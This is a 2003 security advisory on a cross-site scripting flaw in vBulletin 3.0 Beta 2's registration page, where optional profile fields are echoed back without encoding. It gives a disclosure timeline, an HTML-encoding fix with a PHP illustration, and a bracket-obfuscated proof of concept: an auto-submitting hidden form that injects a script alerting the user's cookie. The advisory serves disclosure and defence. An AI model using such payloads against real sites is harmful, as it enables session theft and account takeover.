------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attack is possible. With this vulnerability, an attacker could access other users' and admins' accounts.

Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo; www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
On the new member page (register.php), if you skip a required field the system redirects you back to the same form and automatically refills the fields with the values you entered before. In the standard fields vBulletin handles script injection successfully, but in optional fields such as "Interests-Hobbies", "Biography", "Occupation" etc. it does not, so you can execute any JS through these fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8
...

------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Published : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML-encoding these fields, as is already done for the other inputs, is sufficient.
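
The fix named under Solution, shown as an added PHP example (not vBulletin source and not code from the advisory): a form field refilled with the submitted value, first echoed raw and then HTML-encoded for the attribute context. The function names and the sample value are constructed for illustration; only the field name "field1" and the input attributes come from the advisory.

```php
<?php
// Added illustration, not vBulletin source code. Function names are hypothetical.

// Unsafe: echoes the submitted value back into the attribute unchanged,
// which is the behaviour the advisory describes for the optional fields.
function refill_field_raw(string $name, string $value): string
{
    return '<input type="text" class="bginput" name="' . $name
        . '" value="' . $value . '" size="25" maxlength="250" />';
}

// Safe: HTML-encodes the value for a double-quoted attribute context.
function refill_field_encoded(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" class="bginput" name="'
        . htmlspecialchars($name, $flags, 'UTF-8')
        . '" value="' . htmlspecialchars($value, $flags, 'UTF-8')
        . '" size="25" maxlength="250" />';
}

// Regression check: a refilled field must render as exactly one element.
function tag_count(string $html): int
{
    return (int) preg_match_all('/<[a-zA-Z]/', $html);
}

// Constructed sample input: a harmless value that closes the attribute
// and opens a new element if it is echoed without encoding.
$submitted = ['field1' => '"><b>escaped the attribute</b>'];

foreach ($submitted as $name => $value) {
    $raw  = refill_field_raw($name, $value);
    $safe = refill_field_encoded($name, $value);
    printf("raw     (%d elements): %s\n", tag_count($raw), $raw);
    printf("encoded (%d elements): %s\n", tag_count($safe), $safe);
}
```

A tag count above one for a refilled field means submitted markup reached the page unencoded; the same check can be run against every optional profile field in a regression test.
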
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
ferruh@mavituna.com
http://ferruh.mavituna.com
Web Application Security Specialist